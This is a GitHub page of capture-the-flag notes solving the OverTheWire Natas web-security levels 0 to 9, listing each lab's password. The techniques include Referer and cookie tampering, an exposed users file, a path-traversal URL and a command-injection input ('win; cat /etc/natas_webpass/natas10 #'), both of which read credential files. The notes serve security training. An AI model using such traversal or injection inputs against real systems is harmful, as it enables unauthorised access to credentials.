forked from Shiva108/CTF-notes
-
Notifications
You must be signed in to change notification settings - Fork 0
/
natas.html
132 lines (101 loc) · 3.47 KB
/
natas.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
<h1>Natas overthewire.org Labs</h1>
Username: natas0
Password: natas0
URL: http://natas0.natas.labs.overthewire.org
All passwords are also stored in /etc/natas_webpass/
E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5
The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto
<h2>Natas0</h2>
..
<div id="content">
You can find the password for the next level on this page.
<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
</body>
</html>
Password seems to be generated.
<h1>Natas1</h1>
ctrl+u
..
</pre>
<h1>natas1</h1>
<div id="<a><br />content</a>">
You can find the password for the
next level on this page, but rightclicking has been blocked!
<!--The password for natas2 is ******************************** --></div>
<pre>
ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
<h2>Natas2</h2>
..
</pre>
<h1>natas2</h1>
<div id="<a><br />content</a>">
There is nothing on this page
<img alt="" src="<a href=" />files/pixel.png"></div>
<pre>
http://natas2.natas.labs.overthewire.org/files/users.txt
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH
<h2>Natas3</h2>
Google dork:
site:http://natas3.natas.labs.overthewire.org/
Google output:
directory listing - OverTheWire
natas3.natas.labs.overthewire.org/s3cr3t/
http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt
Google "site:" search
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
<h2>Natas4</h2>
Firefox addon tamper data or refControl, change referrer parameter.
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
Modify the referer field from ‘natas4.natas.labs.overthewire.org’
to ‘natas5.natas.labs.overthewire.org’
(using proxy Intercept "forward" step by step)
<h2>Natas5</h2>
Cookie: __cfduid=dd27015b150c946e18046c9fdc6bd170c1507474900; loggedin=0
In Proxy Intercept step by step:
Use burp suite repeater, set loggedin=1
natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
<h2>Natas6</h2>
..
</pre>
<h1>natas6</h1>
<div id="content">
<?
include "includes/secret.inc";
..
http://natas6.natas.labs.overthewire.org/includes/secret.inc
<!--?
$secret = "FOEIUWGHFEEUHOFUOIU";
?-->
natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
<h2>Natas7</h2>
Click link eg "home":
http://natas7.natas.labs.overthewire.org/index.php?page=home
REMEMBER:
All passwords are also stored in /etc/natas_webpass/
E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
<h2>Natas8</h2>
Source code link: $encodedSecret = "3d3d516343746d4d6d6c315669563362";
Run trough php script:
#!/usr/bin/php
<!--?php // This php code needs to decrypt the following proccess. // bin2hex(strrev(base64_encode($secret))) // The string to decrypt is '3d3d516343746d4d6d6c315669563362'. echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362'))); ?-->
Result: oubWYf2kBq
Or (put in php file an run):
<?
echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")))
?>
Natas9 W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
<h2>Natas9</h2>
If file is in dic we can run command after the;
(Read the html file / source code to find out)
win; cat /etc/natas_webpass/natas10 #
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
<h2>Natas10</h2>